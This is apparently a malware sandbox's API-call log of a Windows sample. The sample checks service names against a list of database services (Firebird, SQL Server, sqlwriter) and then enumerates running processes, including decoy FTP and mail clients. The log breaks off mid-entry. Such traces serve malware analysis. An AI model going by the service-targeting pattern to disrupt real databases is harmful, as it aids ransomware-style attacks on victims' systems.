[0168.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0168.992] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0168.992] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0168.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0168.993] lstrlenW (lpString="StateRepository") returned 15 [0168.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0168.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0168.993] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0168.993] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0168.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0168.993] lstrlenW (lpString="SysMain") returned 7 [0168.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0168.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0168.993] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0168.993] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0168.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0168.993] lstrlenW (lpString="SystemEventsBroker") returned 18 [0168.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0168.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0168.993] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0168.993] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0168.993] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea1c00 | out: hHeap=0x710000) returned 1 [0168.993] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x30c [0169.178] Process32FirstW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.178] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0169.179] lstrlenW (lpString="System") returned 6 [0169.179] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0169.180] lstrlenW (lpString="smss.exe") returned 8 [0169.180] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.181] lstrlenW (lpString="csrss.exe") returned 9 [0169.181] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0169.181] lstrlenW (lpString="wininit.exe") returned 11 [0169.182] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0169.182] lstrlenW (lpString="csrss.exe") returned 9 [0169.183] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0169.183] lstrlenW (lpString="winlogon.exe") returned 12 [0169.183] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0169.184] lstrlenW (lpString="services.exe") returned 12 [0169.184] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0169.185] lstrlenW (lpString="lsass.exe") returned 9 [0169.185] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.185] lstrlenW (lpString="svchost.exe") returned 11 [0169.185] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0169.186] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0169.186] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0169.187] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0169.187] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.187] lstrlenW (lpString="svchost.exe") returned 11 [0169.187] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0169.188] lstrlenW (lpString="dwm.exe") returned 7 [0169.188] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x61, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.189] lstrlenW (lpString="svchost.exe") returned 11 [0169.189] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.190] lstrlenW (lpString="svchost.exe") returned 11 [0169.190] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.190] lstrlenW (lpString="svchost.exe") returned 11 [0169.190] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.191] lstrlenW (lpString="svchost.exe") returned 11 [0169.191] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.192] lstrlenW (lpString="svchost.exe") returned 11 [0169.192] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.192] lstrlenW (lpString="svchost.exe") returned 11 [0169.192] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.193] lstrlenW (lpString="svchost.exe") returned 11 [0169.193] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.194] lstrlenW (lpString="svchost.exe") returned 11 [0169.194] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.194] lstrlenW (lpString="svchost.exe") returned 11 [0169.195] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.195] lstrlenW (lpString="svchost.exe") returned 11 [0169.195] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0169.196] lstrlenW (lpString="spoolsv.exe") returned 11 [0169.196] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.197] lstrlenW (lpString="svchost.exe") returned 11 [0169.197] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0169.198] lstrlenW (lpString="audiodg.exe") returned 11 [0169.198] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0169.198] lstrlenW (lpString="sihost.exe") returned 10 [0169.198] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.199] lstrlenW (lpString="svchost.exe") returned 11 [0169.199] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0169.200] lstrlenW (lpString="taskhostw.exe") returned 13 [0169.200] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.201] lstrlenW (lpString="explorer.exe") returned 12 [0169.201] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0169.202] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0169.202] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0169.822] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0169.822] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0169.823] lstrlenW (lpString="Memory Compression") returned 18 [0169.823] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0169.824] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0169.824] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0169.867] lstrlenW (lpString="SearchUI.exe") returned 12 [0169.867] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0169.868] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0169.868] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.869] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0169.869] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0169.870] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0169.870] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0169.871] lstrlenW (lpString="workers.exe") returned 11 [0169.871] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0169.871] lstrlenW (lpString="succeed.exe") returned 11 [0169.871] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0169.872] lstrlenW (lpString="washer jar.exe") returned 14 [0169.872] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0169.873] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0169.873] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0169.873] lstrlenW (lpString="useful_courts.exe") returned 17 [0169.873] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0169.874] lstrlenW (lpString="compounds spanish.exe") returned 21 [0169.874] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0169.875] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0169.875] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0169.876] lstrlenW (lpString="try.exe") returned 7 [0169.876] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0169.877] lstrlenW (lpString="statuteide.exe") returned 14 [0169.877] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0169.877] lstrlenW (lpString="invite.exe") returned 10 [0169.877] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0169.878] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0169.878] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0169.878] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0169.879] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0169.879] lstrlenW (lpString="modules_recommend.exe") returned 21 [0169.879] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0169.880] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0169.880] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.881] lstrlenW (lpString="svchost.exe") returned 11 [0169.881] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0169.881] lstrlenW (lpString="3dftp.exe") returned 9 [0169.882] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0169.882] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0169.882] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0169.883] lstrlenW (lpString="alftp.exe") returned 9 [0169.883] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0169.884] lstrlenW (lpString="barca.exe") returned 9 [0169.884] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0169.885] lstrlenW (lpString="bitkinex.exe") returned 12 [0169.885] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0169.886] lstrlenW (lpString="coreftp.exe") returned 11 [0169.886] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0169.887] lstrlenW (lpString="far.exe") returned 7 [0169.887] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0169.889] lstrlenW (lpString="filezilla.exe") returned 13 [0169.889] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0169.890] lstrlenW (lpString="flashfxp.exe") returned 12 [0169.890] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0169.891] lstrlenW (lpString="fling.exe") returned 9 [0169.891] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0169.892] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0169.893] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0169.894] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0169.894] Process32NextW (in: hSnapshot=0x30c, lppe=0x24efd2c | out: 